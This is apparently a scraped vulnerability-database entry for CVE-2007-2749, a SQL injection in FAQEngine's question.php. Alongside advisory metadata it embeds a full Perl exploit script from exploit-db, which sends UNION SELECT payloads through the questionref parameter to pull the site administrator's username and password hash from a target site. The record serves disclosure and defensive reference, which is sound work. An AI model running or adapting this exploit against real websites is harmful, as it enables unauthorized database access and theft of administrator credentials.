ID OSVDB:36091
Type osvdb
Reporter OSVDB
Modified 2007-05-16T07:18:54
Description
No description provided by the source
References:
Secunia Advisory ID:25297
Other Advisory URL: http://milw0rm.com/exploits/3943
ISS X-Force ID: 34355
CVE-2007-2749
Bugtraq ID: 24032
{"href": "https://vulners.com/osvdb/OSVDB:36091", "history": [], "id": "OSVDB:36091", "reporter": "OSVDB", "published": "2007-05-16T07:18:54", "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:25297](https://secuniaresearch.flexerasoftware.com/advisories/25297/)\nOther Advisory URL: http://milw0rm.com/exploits/3943\nISS X-Force ID: 34355\n[CVE-2007-2749](https://vulners.com/cve/CVE-2007-2749)\nBugtraq ID: 24032\n", "title": "FAQEngine question.php questionref Variable SQL Injection", "lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "hash": "59171d7ce15aa9747851de2065aa0ec6734219ab9a45240643ffee253d8d1ca9", "references": [], "edition": 1, "cvelist": ["CVE-2007-2749"], "affectedSoftware": [], "viewCount": 2, "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2017-04-28T13:20:32"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-2749"]}, {"type": "exploitdb", "idList": ["EDB-ID:3943"]}], "modified": "2017-04-28T13:20:32"}, "vulnersScore": 6.9}, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "bc1d72460062e7d0be8f537293a8e35b"}, {"key": "cvss", "hash": "26769fd423968d45be7383413e2552f1"}, {"key": "description", "hash": "7a60ffc9ff77c8cc60384e8cc244a951"}, {"key": "href", "hash": "140aa954f3b046b76f296e937a5360b6"}, {"key": "modified", "hash": "09c51791a3e1e031fba843c1e2dd7cf7"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "09c51791a3e1e031fba843c1e2dd7cf7"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "955b328dc7cd615c13af5464c9183464"}, {"key": "title", "hash": "118499ef294994d0059fe3593efdc59d"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "objectVersion": "1.2", "modified": "2007-05-16T07:18:54"}
{"cve": [{"lastseen": "2019-05-29T18:08:59", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in question.php in FAQEngine 4.16.03 and earlier allows remote attackers to execute arbitrary SQL commands via the questionref parameter in a display action.", "modified": "2017-10-11T01:32:00", "id": "CVE-2007-2749", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2749", "published": "2007-05-17T20:30:00", "title": "CVE-2007-2749", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2016-01-31T19:40:12", "bulletinFamily": "exploit", "description": "FAQEngine <= 4.16.03 (question.php questionref) SQL Injection Exploit. CVE-2007-2749. Webapps exploit for php platform", "modified": "2007-05-16T00:00:00", "published": "2007-05-16T00:00:00", "id": "EDB-ID:3943", "href": "https://www.exploit-db.com/exploits/3943/", "type": "exploitdb", "title": "FAQEngine <= 4.16.03 question.php questionref SQL Injection Exploit", "sourceData": "#!/usr/bin/perl -w\n\n#################################################################################\n#\t\t\t\t\t\t\t\t\t\t#\n#\t FAQEngine <= v4.16.03 SQL Injection Exploit\t\t\t#\n#\t\t\t\t\t\t\t\t\t\t#\n# Discovered by: Silentz\t\t\t\t\t\t\t#\n# Payload: Admin Username & Hash Retrieval\t\t\t\t\t#\n# Website: http://www.w4ck1ng.com\t\t\t\t\t\t#\n# \t\t\t\t\t\t\t\t\t\t#\n# Vulnerable Code (question.php):\t\t\t\t\t\t#\n#\t\t\t\t\t\t\t\t\t\t#\n# $sql = \"select * from \".$tableprefix.\"_questions where publish=1 \t#\n# and questionref=$questionref order by enterdate desc\";\t\t\t#\n#\t\t\t\t\t\t\t\t\t\t#\n# PoC: question.php?mode=display&questionref=-999 UNION SELECT 0,0,0,0,\t\t#\n# username,password,0,0,0,0,0,0,0,0,0,0 FROM faq_admins WHERE usernr=1 /*\t#\n# \t\t\t\t\t\t\t\t\t\t#\n# Subject To: The question display mode being enabled\t\t\t\t#\n# GoogleDork: Get your own!\t\t\t\t\t\t\t#\n#\t\t\t\t\t\t\t\t\t\t#\n# Shoutz: The entire w4ck1ng community\t\t\t\t\t\t#\n#\t\t\t\t\t\t\t\t\t\t#\n#################################################################################\n\nuse LWP::UserAgent;\n\nif (@ARGV < 1){\nprint \"-------------------------------------------------------------------------\\r\\n\";\nprint \" FAQEngine <= v4.16.03 SQL Injection Exploit\\r\\n\";\nprint \"-------------------------------------------------------------------------\\r\\n\";\nprint \"Usage: w4ck1ng_faqengine.pl [PATH]\\r\\n\\r\\n\";\nprint \"[PATH] = Path where FAQEngine is located\\r\\n\\r\\n\";\nprint \"e.g. w4ck1ng_faqengine.pl http://victim.com/faq/\\r\\n\";\nprint \"-------------------------------------------------------------------------\\r\\n\";\nprint \" \t\t http://www.w4ck1ng.com\\r\\n\";\nprint \" \t\t ...Silentz\\r\\n\";\nprint \"-------------------------------------------------------------------------\\r\\n\";\nexit();\n}\n\n$b = LWP::UserAgent->new() or die \"Could not initialize browser\\n\";\n$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');\n\n@paths = (\n\"question.php?mode=display&lang=en&questionref=-999 UNION SELECT 0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,0 FROM faq_admins WHERE usernr=1 /*\",\n\"question.php?mode=display&lang=en&questionref=-999 UNION SELECT 0,0,0,0,0,username,0,0,0,0,0,0,0,0,0 FROM faq_admins WHERE usernr=1 /*\",\n\"question.php?mode=display&lang=en&questionref=-999 UNION SELECT 0,0,0,0,0,username,0,0,0,0,0,0,0,0,0 FROM faq_admins WHERE usernr=1 /*\"\n);\n\nfor($i=0;$i<3;$i++){\n $host = $ARGV[0] . $paths[$i];\n $res = $b->request(HTTP::Request->new(GET=>$host));\n ($user) = $res->content =~ /\">([0-9a-zA-Z]+)<\\/span><\\/td><\\/tr>/;\n\n if($user){ last; }\n}\n\nif($user){\n print \"-------------------------------------------------------------------------\\r\\n\";\n print \" FAQEngine <= v4.16.03 SQL Injection Exploit\\r\\n\";\n print \"-------------------------------------------------------------------------\\r\\n\";\n print \"[+] Admin User : $user\\n\";\n}\n\n\n@paths = (\n\"question.php?mode=display&lang=en&questionref=-999 UNION SELECT 0,0,0,0,password,0,0,0,0,0,0,0,0,0,0,0 FROM faq_admins WHERE usernr=1 /*\",\n\"question.php?mode=display&lang=en&questionref=-999 UNION SELECT 0,0,0,0,password,0,0,0,0,0,0,0,0,0,0 FROM faq_admins WHERE usernr=1 /*\",\n\"question.php?mode=display&lang=en&questionref=-999 UNION SELECT 0,0,0,0,0,password,0,0,0,0,0,0,0,0,0 FROM faq_admins WHERE usernr=1 /*\"\n);\n\nfor($i=0;$i<3;$i++){\n $host = $ARGV[0] . $paths[$i];\n $res = $b->request(HTTP::Request->new(GET=>$host));\n ($hash) = $res->content =~ /([0-9a-fA-F]{32})/;\n if($hash){ last; }\n}\n\nif($hash){\n print \"[+] Admin Hash : $hash\\n\";\n print \"-------------------------------------------------------------------------\\r\\n\";\n print \" \t\t http://www.w4ck1ng.com\\r\\n\";\n print \" \t\t ...Silentz\\r\\n\";\n print \"-------------------------------------------------------------------------\\r\\n\";\n} else {\n print \"\\nExploit Failed...\\n\";\n}\n\n# milw0rm.com [2007-05-16]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/3943/"}]}
